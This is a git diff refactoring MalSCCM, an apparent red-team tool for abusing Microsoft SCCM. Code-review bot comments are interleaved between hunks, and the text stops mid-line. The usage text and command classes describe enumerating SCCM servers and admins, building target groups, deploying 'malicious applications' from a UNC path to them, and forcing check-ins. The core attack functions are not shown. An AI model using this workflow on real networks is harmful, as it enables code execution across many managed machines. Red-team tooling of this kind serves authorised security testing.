diff --git a/.gitignore b/.gitignore index b1c2275..e343822 100644 --- a/.gitignore +++ b/.gitignore @@ -5,4 +5,4 @@ [Bb]in/ [Oo]bj/ .DS_Store - +*.idea diff --git a/MalSCCM/Args/ArgumentParser.cs b/MalSCCM/Args/ArgumentParser.cs index da49f9d..932764d 100644 --- a/MalSCCM/Args/ArgumentParser.cs +++ b/MalSCCM/Args/ArgumentParser.cs @@ -1,43 +1,42 @@ using System.Collections.Generic; using System.Diagnostics; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class ArgumentParser { - public static class ArgumentParser + public static ArgumentParserResult Parse(IEnumerable args) { - public static ArgumentParserResult Parse(IEnumerable args) + var arguments = new Dictionary(); + try { - var arguments = new Dictionary(); - try + foreach (var argument in args) { - foreach (var argument in args) + var idx = argument.IndexOf(':'); + if (idx > 0) + { + arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); + } + else { - var idx = argument.IndexOf(':'); + idx = argument.IndexOf('='); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { - idx = argument.IndexOf('='); - if (idx > 0) - { - arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); - } - else - { - arguments[argument] = string.Empty; - } + arguments[argument] = string.Empty; } } - - return ArgumentParserResult.Success(arguments); - } - catch (System.Exception ex) - { - Debug.WriteLine(ex.Message); - return ArgumentParserResult.Failure(); } + + return ArgumentParserResult.Success(arguments); + } + catch (System.Exception ex) + { + Debug.WriteLine(ex.Message); + return ArgumentParserResult.Failure(); } } -} +} \ No newline at end of file diff --git a/MalSCCM/Args/ArgumentParserResult.cs b/MalSCCM/Args/ArgumentParserResult.cs index 26c1aca..bd9533c 100644 --- a/MalSCCM/Args/ArgumentParserResult.cs +++ b/MalSCCM/Args/ArgumentParserResult.cs 
@@ -1,23 +1,22 @@ using System.Collections.Generic; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class ArgumentParserResult { - public class ArgumentParserResult - { - public bool ParsedOk { get; } - public Dictionary Arguments { get; } + public bool ParsedOk { get; } + public Dictionary Arguments { get; } - private ArgumentParserResult(bool parsedOk, Dictionary arguments) - { - ParsedOk = parsedOk; - Arguments = arguments; - } + private ArgumentParserResult(bool parsedOk, Dictionary arguments) + { + ParsedOk = parsedOk; + Arguments = arguments; + } - public static ArgumentParserResult Success(Dictionary arguments) - => new ArgumentParserResult(true, arguments); + public static ArgumentParserResult Success(Dictionary arguments) + => new ArgumentParserResult(true, arguments); - public static ArgumentParserResult Failure() - => new ArgumentParserResult(false, null); + public static ArgumentParserResult Failure() + => new ArgumentParserResult(false, null); - } } \ No newline at end of file diff --git a/MalSCCM/Args/CommandCollection.cs b/MalSCCM/Args/CommandCollection.cs index 523a9e4..9f0273b 100644 --- a/MalSCCM/Args/CommandCollection.cs +++ b/MalSCCM/Args/CommandCollection.cs 
@@ -1,48 +1,52 @@ using System; using System.Collections.Generic; +using System.Linq; + using MalSCCM.Commands; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class CommandCollection { - public class CommandCollection - { - private readonly Dictionary> _availableCommands = new Dictionary>(); + private readonly List _availableCommands = new(); - // How To Add A New Command: - // 1. Create your command class in the Commands Folder - // a. That class must have a CommandName static property that has the Command's name - // and must also Implement the ICommand interface - // b. Put the code that does the work into the Execute() method - // 2. Add an entry to the _availableCommands dictionary in the Constructor below. + // How To Add A New Command: + // - Create your command class in the Commands Folder + // - That class must implement the ICommand interface + // - Give the command a name + // - Put the code that does the work into the Execute() method - public CommandCollection() + public CommandCollection() + { + // instantiate each command dynamically + + var self = typeof(CommandCollection).Assembly; + + // loop through each type + foreach (var type in self.GetTypes()) { - _availableCommands.Add(Inspect.CommandName, () => new Inspect()); - _availableCommands.Add(Group.CommandName, () => new Group()); - _availableCommands.Add(App.CommandName, () => new App()); - _availableCommands.Add(Checkin.CommandName, () => new Checkin()); - _availableCommands.Add(Locate.CommandName, () => new Locate()); - + // ignore if they don't implement ICommand or if it's the interface itself + if (!typeof(ICommand).IsAssignableFrom(type) || type.Name.Equals("ICommand")) + continue; + + // instantiate a new instance + var command = (ICommand)Activator.CreateInstance(type); + _availableCommands.Add(command); } + } - public bool ExecuteCommand(string commandName, Dictionary arguments) - { - bool commandWasFound; - - if (string.IsNullOrEmpty(commandName) || 
_availableCommands.ContainsKey(commandName) == false) - commandWasFound= false; - else - { - // Create the command object - var command = _availableCommands[commandName].Invoke(); - - // and execute it with the arguments from the command line - command.Execute(arguments); - - commandWasFound = true; - } - - return commandWasFound; - } + public bool ExecuteCommand(string commandName, Dictionary arguments) + { + // find the correct command, case-insensitive + var command = _availableCommands.FirstOrDefault(c => + c.CommandName.Equals(commandName, StringComparison.OrdinalIgnoreCase)); + + // return false if command is null (i.e. not found) + if (command is null) + return false; + + // otherwise execute and return true + command.Execute(arguments); + return true; } } \ No newline at end of file diff --git a/MalSCCM/Args/Info.cs b/MalSCCM/Args/Info.cs index f0a4d28..4cf1a4c 100644 --- a/MalSCCM/Args/Info.cs +++ b/MalSCCM/Args/Info.cs 
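Review bot: The discovery loop in the new constructor excludes only the interface, and only by name (`type.Name.Equals("ICommand")`), so an abstract class or a type without a public parameterless constructor that implements ICommand would make `Activator.CreateInstance(type)` throw while the collection is being built. A structural filter is safer: `if (!typeof(ICommand).IsAssignableFrom(type) || type.IsInterface || type.IsAbstract) continue;`. The removed dictionary's `Add` threw on a duplicate command name, whereas `FirstOrDefault` in ExecuteCommand now silently picks whichever matching type was enumerated first, so a name clash goes unnoticed. The how-to comment above the constructor should state that CommandName must be unique and is matched case-insensitively.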
@@ -1,48 +1,53 @@ using System; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class Info { - public static class Info + public static void ShowLogo() + { + const string logo = """ + __ __ _ ____ ____ ____ __ __ + | \/ | __ _| / ___| / ___/ ___| \/ | + | |\/| |/ _` | \___ \| | | | | |\/| | + | | | | (_| | |___) | |__| |___| | | | + |_| |_|\__,_|_|____/ \____\____|_| |_| + Phil Keeble @ Nettitude Red Team + + """; + + Console.WriteLine(logo); + } + + public static void ShowUsage() { - public static void ShowLogo() - { - string logo = @" __ __ _ ____ ____ ____ __ __ -| \/ | __ _| / ___| / ___/ ___| \/ | -| |\/| |/ _` | \___ \| | | | | |\/| | -| | | | (_| | |___) | |__| |___| | | | -|_| |_|\__,_|_|____/ \____\____|_| |_| - Phil Keeble @ Nettitude Red Team -"; - Console.WriteLine(logo); - } - - public static void ShowUsage() - { - string usage = @"Commands listed below have optional parameters in <>. - -Attempt to find the SCCM management and primary servers: - MalSCCM.exe locate - -Inspect the primary server to gather SCCM information: - MalSCCM.exe inspect - -Create/Modify/Delete Groups to add targets in for deploying malicious apps. 
Groups can either be for devices or users: - MalSCCM.exe group /create /groupname:example /grouptype:[user|device] - MalSCCM.exe group /delete /groupname:example - MalSCCM.exe group /addhost /groupname:example /host:examplehost - MalSCCM.exe group /adduser /groupname:example /user:exampleuser - -Create/Deploy/Delete malicious applications: - MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" - MalSCCM.exe app /delete /name:appname - MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 - MalSCCM.exe app /deletedeploy /name:appname - MalSCCM.exe app /cleanup /name:appname - -Force devices of a group to checkin within a couple minutes: - MalSCCM.exe checkin /groupname:example -"; - Console.WriteLine(usage); - } + const string usage = """ + Commands listed below have optional parameters in <>. + + Attempt to find the SCCM management and primary servers: + MalSCCM.exe locate + + Inspect the primary server to gather SCCM information: + MalSCCM.exe inspect + + Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: + MalSCCM.exe group /create /groupname:example /grouptype:[user|device] + MalSCCM.exe group /delete /groupname:example + MalSCCM.exe group /addhost /groupname:example /host:examplehost + MalSCCM.exe group /adduser /groupname:example /user:exampleuser + + Create/Deploy/Delete malicious applications: + MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" + MalSCCM.exe app /delete /name:appname + MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 + MalSCCM.exe app /deletedeploy /name:appname + MalSCCM.exe app /cleanup /name:appname + + Force devices of a group to checkin within a couple minutes: + MalSCCM.exe checkin /groupname:example + + """; + + Console.WriteLine(usage); } -} +} \ No newline at end of file diff --git a/MalSCCM/Commands/App.cs b/MalSCCM/Commands/App.cs index f332388..20123f0 100644 
--- a/MalSCCM/Commands/App.cs
+++ b/MalSCCM/Commands/App.cs
@@ -1,92 +1,89 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class App : ICommand - { - - public static string CommandName => "app"; - public static string AppName = ""; - public static string UNCPath = ""; - public static string AssignmentName = ""; +namespace MalSCCM.Commands; +public class App : ICommand +{ + public string CommandName => "app"; + + public static string AppName = ""; + public static string UNCPath = ""; + public static string AssignmentName = ""; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + Inspect.ServerName = argument; + } - if (arguments.ContainsKey("/name")) - { - AppName = arguments["/name"]; - } + Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - if (arguments.ContainsKey("/uncpath")) - { - UNCPath = arguments["/uncpath"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + Group.GroupName = argument1; + } - if (arguments.ContainsKey("/assignmentname")) - { - AssignmentName = arguments["/assignmentname"]; - } + if (arguments.TryGetValue("/name", out var argument2)) + { + AppName = argument2; + } - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } + if (arguments.TryGetValue("/uncpath", out var argument3)) + { + UNCPath = argument3; + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Application"); - 
Application.FbCreateSCCMApplication(); - } + if (arguments.TryGetValue("/assignmentname", out var argument4)) + { + AssignmentName = argument4; + } - if (arguments.ContainsKey("/delete")) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/deploy")) - { - Console.WriteLine("[*] Action: Gathering group ID"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Deploying SCCM Application"); - Application.FbDeploySCCMApplication(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Application"); + Application.FbCreateSCCMApplication(); + } - if (arguments.ContainsKey("/deletedeploy")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); + } - if (arguments.ContainsKey("/cleanup")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); - } + if (arguments.ContainsKey("/deploy")) + { + Console.WriteLine("[*] Action: Gathering group ID"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Deploying SCCM Application"); + Application.FbDeploySCCMApplication(); + } + if (arguments.ContainsKey("/deletedeploy")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + } - 
Console.WriteLine("\r\n[*] App complete\r\n"); + if (arguments.ContainsKey("/cleanup")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); } + + Console.WriteLine("\r\n[*] App complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Checkin.cs b/MalSCCM/Commands/Checkin.cs index 0766f47..af4f9ee 100644 --- a/MalSCCM/Commands/Checkin.cs +++ b/MalSCCM/Commands/Checkin.cs 
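Review bot: The out variables introduced by the TryGetValue conversion in Execute are named `argument`, `argument1` … `argument4`, which does not say which switch each one holds and makes a copy-paste mix-up easy to miss. Names that follow the switch read better, for example `if (arguments.TryGetValue("/name", out var appName))` and `out var uncPath`. The same numbered pattern appears in the Checkin.cs and Group.cs hunks. `CommandName` became an instance property while `AppName`, `UNCPath` and `AssignmentName` remain public mutable static fields; a one-line comment such as `// static: read by lib/Application.cs` would explain why they are not instance state.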
@@ -1,46 +1,44 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Checkin : ICommand - { - - public static string CommandName => "checkin"; +namespace MalSCCM.Commands; +public class Checkin : ICommand +{ + public string CommandName => "checkin"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } + Inspect.ServerName = argument; + } - Console.WriteLine("[*] Action: Causing SCCM poll"); + Console.WriteLine("[*] Action: Causing SCCM poll"); - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + Group.GroupName = argument1; + } - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/groupname")) - { - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); - Check.FbSCCMDeviceCheckin(); - } - Console.WriteLine("\r\n[*] Checkin complete\r\n"); + if (arguments.ContainsKey("/groupname")) + { + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); + Check.FbSCCMDeviceCheckin(); } + + 
Console.WriteLine("\r\n[*] Checkin complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Group.cs b/MalSCCM/Commands/Group.cs index 3f768d8..09c79a5 100644 --- a/MalSCCM/Commands/Group.cs +++ b/MalSCCM/Commands/Group.cs 
@@ -1,99 +1,96 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Group : ICommand { - public class Group : ICommand + public string CommandName => "group"; + + public static string GroupName = ""; + public static string GroupType = ""; + public static string SystemCollectionID = ""; + public static string UserCollectionID = ""; + public static string TargetCollectionID = ""; + public static string UserName = ""; + public static string DeviceName = ""; + public static string ResourceID = ""; + + public void Execute(Dictionary arguments) { - - public static string CommandName => "group"; - public static string GroupName = ""; - public static string GroupType = ""; - public static string SystemCollectionID = ""; - public static string UserCollectionID = ""; - public static string TargetCollectionID = ""; - public static string UserName = ""; - public static string DeviceName = ""; - public static string ResourceID = ""; - - - public void Execute(Dictionary arguments) + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - - if (arguments.ContainsKey("/groupname")) - { - GroupName = arguments["/groupname"]; - } + Inspect.ServerName = argument; + } - if (arguments.ContainsKey("/grouptype")) - { - GroupType = arguments["/grouptype"]; - } + Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - if (arguments.ContainsKey("/user")) - { - UserName = arguments["/user"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + GroupName = argument1; + } - if (arguments.ContainsKey("/host")) - { - DeviceName = arguments["/host"]; - } + if (arguments.TryGetValue("/grouptype", out var argument2)) + { + GroupType = argument2; + } - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, 
trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } + if (arguments.TryGetValue("/user", out var argument3)) + { + UserName = argument3; + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Creating Collection"); - Groups.FbNewSCCMCollection(); - } + if (arguments.TryGetValue("/host", out var argument4)) + { + DeviceName = argument4; + } - if (arguments.ContainsKey("/delete")) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("[*] Action: Deleting SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Removing Collection"); - Groups.FbRemoveSCCMCollection(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/adduser")) - { - Console.WriteLine("[*] Action: Adding User to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding User"); - Groups.FbAddUserToSCCMCollection(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Creating Collection"); + Groups.FbNewSCCMCollection(); + } - if (arguments.ContainsKey("/addhost")) - { - Console.WriteLine("[*] Action: Adding System to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - 
Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding Device"); - Groups.FbAddDeviceToSCCMCollection(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Removing Collection"); + Groups.FbRemoveSCCMCollection(); + } + if (arguments.ContainsKey("/adduser")) + { + Console.WriteLine("[*] Action: Adding User to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding User"); + Groups.FbAddUserToSCCMCollection(); + } - Console.WriteLine("\r\n[*] Group complete\r\n"); + if (arguments.ContainsKey("/addhost")) + { + Console.WriteLine("[*] Action: Adding System to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding Device"); + Groups.FbAddDeviceToSCCMCollection(); } + + Console.WriteLine("\r\n[*] Group complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/ICommand.cs b/MalSCCM/Commands/ICommand.cs index 4330083..c8dfebb 100644 --- a/MalSCCM/Commands/ICommand.cs +++ b/MalSCCM/Commands/ICommand.cs @@ -1,9 +1,9 @@ using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public interface ICommand { - public interface ICommand - { - void Execute(Dictionary arguments); - } + string CommandName { get; } + void Execute(Dictionary arguments); } \ No newline at end of file diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index 61d4654..ff51ee6 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs 
@@ -1,99 +1,102 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Inspect : ICommand - { +namespace MalSCCM.Commands; - public static string CommandName => "inspect"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; +public class Inspect : ICommand +{ + public string CommandName => "inspect"; + + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Inspect SCCM Server"); - - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } - - if (arguments.ContainsKey("/all")) - { - - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + ServerName = argument; + } - if (arguments.ContainsKey("/computers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - } + Console.WriteLine("[*] Action: Inspect SCCM Server"); - if (arguments.ContainsKey("/forest")) + if 
(!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/applications")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - } + if (arguments.ContainsKey("/all")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); + } - if (arguments.ContainsKey("/packages")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - } + if (arguments.ContainsKey("/computers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + } - if (arguments.ContainsKey("/groups")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - } + if (arguments.ContainsKey("/forest")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + } - if (arguments.ContainsKey("/primaryusers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - } + if 
(arguments.ContainsKey("/applications")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + } - if (arguments.ContainsKey("/deployments")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + if (arguments.ContainsKey("/packages")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + } + if (arguments.ContainsKey("/groups")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + } + if (arguments.ContainsKey("/primaryusers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + } + if (arguments.ContainsKey("/deployments")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + } - Console.WriteLine("\r\n[*] Inspect complete\r\n"); + if (arguments.ContainsKey("/admins")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); } + + Console.WriteLine("\r\n[*] Inspect complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Locate.cs b/MalSCCM/Commands/Locate.cs index db15508..c9e42bd 100644 --- a/MalSCCM/Commands/Locate.cs +++ b/MalSCCM/Commands/Locate.cs 
@@ -1,46 +1,45 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Locate : ICommand - { +namespace MalSCCM.Commands; - public static string CommandName => "locate"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; +public class Locate : ICommand +{ + public string CommandName => "locate"; + + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } + ServerName = argument; + } - Console.WriteLine("[*] Action: Locating SCCM Management Servers"); + Console.WriteLine("[*] Action: Locating SCCM Management Servers"); - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); - Console.WriteLine("[!] Note - You can try use 'inspect /server:' to see if the management server is exploitable."); - Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); + Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); + Console.WriteLine("[!] 
Note - You can try use 'inspect /server:' to see if the management server is exploitable."); + Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); - Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); + Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); - Enum.FbGetSCCMPrimaryServerRegKey(); + Enum.FbGetSCCMPrimaryServerRegKey(); - Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); - Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); + Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); + Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); - Console.WriteLine("\r\n[*] Locate complete\r\n"); - } + Console.WriteLine("\r\n[*] Locate complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/MalSCCM.csproj b/MalSCCM/MalSCCM.csproj index 53d038d..cefe1d0 100644 --- a/MalSCCM/MalSCCM.csproj +++ b/MalSCCM/MalSCCM.csproj @@ -8,9 +8,9 @@ Exe MalSCCM MalSCCM - v3.5 512 true + 11 AnyCPU diff --git a/MalSCCM/Program.cs b/MalSCCM/Program.cs index a08553c..43e0470 100644 --- a/MalSCCM/Program.cs +++ b/MalSCCM/Program.cs 
@@ -1,47 +1,46 @@ using System; using System.Collections.Generic; + using MalSCCM.Args; -namespace MalSCCM +namespace MalSCCM; + +public static class Program { - class Program + private static void MainExecute(string commandName, Dictionary parsedArgs) { - private static void MainExecute(string commandName, Dictionary parsedArgs) - { - // main execution logic - - Info.ShowLogo(); + // main execution logic - try - { - var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); - - // show the usage if no commands were found for the command name - if (commandFound == false) - Info.ShowUsage(); - } - catch (Exception e) - { - Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); - Console.WriteLine(e); - } - } + Info.ShowLogo(); - public static void Main(string[] args) + try { - // try to parse the command line arguments, show usage on failure and then bail - var parsed = ArgumentParser.Parse(args); - if (parsed.ParsedOk == false) - { - Info.ShowLogo(); - Info.ShowUsage(); - return; - } + var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); - var commandName = args.Length != 0 ? args[0] : ""; + // show the usage if no commands were 